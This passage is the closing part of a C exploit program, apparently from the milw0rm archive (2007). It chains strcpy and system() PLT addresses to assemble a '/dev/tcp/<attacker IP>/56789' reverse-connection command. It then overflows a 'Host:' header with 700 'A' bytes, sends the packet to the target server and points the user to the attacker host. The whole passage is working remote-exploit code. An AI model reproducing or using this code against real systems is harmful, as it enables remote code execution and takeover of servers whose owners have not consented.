__GOGOSSING(do_ex,i,strcpy_plt);
__GOGOSSING(do_ex,i,move_esp);
__GOGOSSING(do_ex,i,cmd_loc+l);
__GOGOSSING(do_ex,i,tcp_str1);
l+=2; /* "/t" */
__GOGOSSING(do_ex,i,strcpy_plt);
__GOGOSSING(do_ex,i,move_esp);
__GOGOSSING(do_ex,i,cmd_loc+l);
__GOGOSSING(do_ex,i,tcp_str2);
l+=2; /* "cp" */
__GOGOSSING(do_ex,i,strcpy_plt);
__GOGOSSING(do_ex,i,move_esp);
__GOGOSSING(do_ex,i,cmd_loc+l);
__GOGOSSING(do_ex,i,slash_str);
l+=1; /* "/" */
/* IP address part */
for(ip=0;ip<10;ip++){
__GOGOSSING(do_ex,i,strcpy_plt);
__GOGOSSING(do_ex,i,move_esp);
__GOGOSSING(do_ex,i,cmd_loc+l);
switch(attacker_ip[ip]){
case '0':
__GOGOSSING(do_ex,i,num);
break;
case '1':
__GOGOSSING(do_ex,i,num+1);
break;
case '2':
__GOGOSSING(do_ex,i,num+2);
break;
case '3':
__GOGOSSING(do_ex,i,num+3);
break;
case '4':
__GOGOSSING(do_ex,i,num+4);
break;
case '5':
__GOGOSSING(do_ex,i,num+5);
break;
case '6':
__GOGOSSING(do_ex,i,num+6);
break;
case '7':
__GOGOSSING(do_ex,i,num+7);
break;
case '8':
__GOGOSSING(do_ex,i,num+8);
break;
case '9':
__GOGOSSING(do_ex,i,num+9);
break;
}
l+=1;
}
__GOGOSSING(do_ex,i,strcpy_plt);
__GOGOSSING(do_ex,i,move_esp);
__GOGOSSING(do_ex,i,cmd_loc+l);
__GOGOSSING(do_ex,i,slash_str);
l+=1; /* "/" */
__GOGOSSING(do_ex,i,strcpy_plt);
__GOGOSSING(do_ex,i,move_esp);
__GOGOSSING(do_ex,i,cmd_loc+l);
__GOGOSSING(do_ex,i,port_56789);
l+=5; /* "56789" */
__GOGOSSING(do_ex,i,strcpy_plt);
__GOGOSSING(do_ex,i,move_esp);
__GOGOSSING(do_ex,i,cmd_loc+l);
__GOGOSSING(do_ex,i,redir_2);
l+=1; /* ">" */
__GOGOSSING(do_ex,i,strcpy_plt);
__GOGOSSING(do_ex,i,move_esp);
__GOGOSSING(do_ex,i,cmd_loc+l);
__GOGOSSING(do_ex,i,null_str);
/* null */
__GOGOSSING(do_ex,i,strcpy_plt);
__GOGOSSING(do_ex,i,move_esp);
__GOGOSSING(do_ex,i,null_str-40);
__GOGOSSING(do_ex,i,cmd_loc+3);
/* copy, "/dev/tcp/ip_addr/port" */
__GOGOSSING(do_ex,i,strcpy_plt);
__GOGOSSING(do_ex,i,move_esp);
__GOGOSSING(do_ex,i,cmd_loc+l);
__GOGOSSING(do_ex,i,null_str-40);
l+=24; /* "/dev/tcp/ip_addr/port" */
__GOGOSSING(do_ex,i,strcpy_plt);
__GOGOSSING(do_ex,i,move_esp);
__GOGOSSING(do_ex,i,cmd_loc+l);
__GOGOSSING(do_ex,i,null_str); /* port number: 5678 */
/* system() plt */
__GOGOSSING(do_ex,i,system_plt);
__GOGOSSING(do_ex,i,0x82828282);
__GOGOSSING(do_ex,i,cmd_loc);
sprintf(do_ex+i,"\nHost: ");
i=strlen(do_ex);
for(l=0;l<700;l++){
do_ex[i++]='A';
}
do_ex[i++]='\n';
do_ex[i++]='\n';
printf("** total packet size: %d\n",strlen(do_ex));
l=connect(sock,(struct sockaddr *)&saddr,sizeof(struct sockaddr));
if(l==-1){
printf("** connect() error\n**\n*/\n");
return -1;
}
else {
printf("** send exploit\n");
send(sock,do_ex,i,0);
}
close(sock);
printf("** attacker host, check it up, now!\n**\n*/\n");
exit(0);
}
/* eox */
// milw0rm.com [2007-05-02]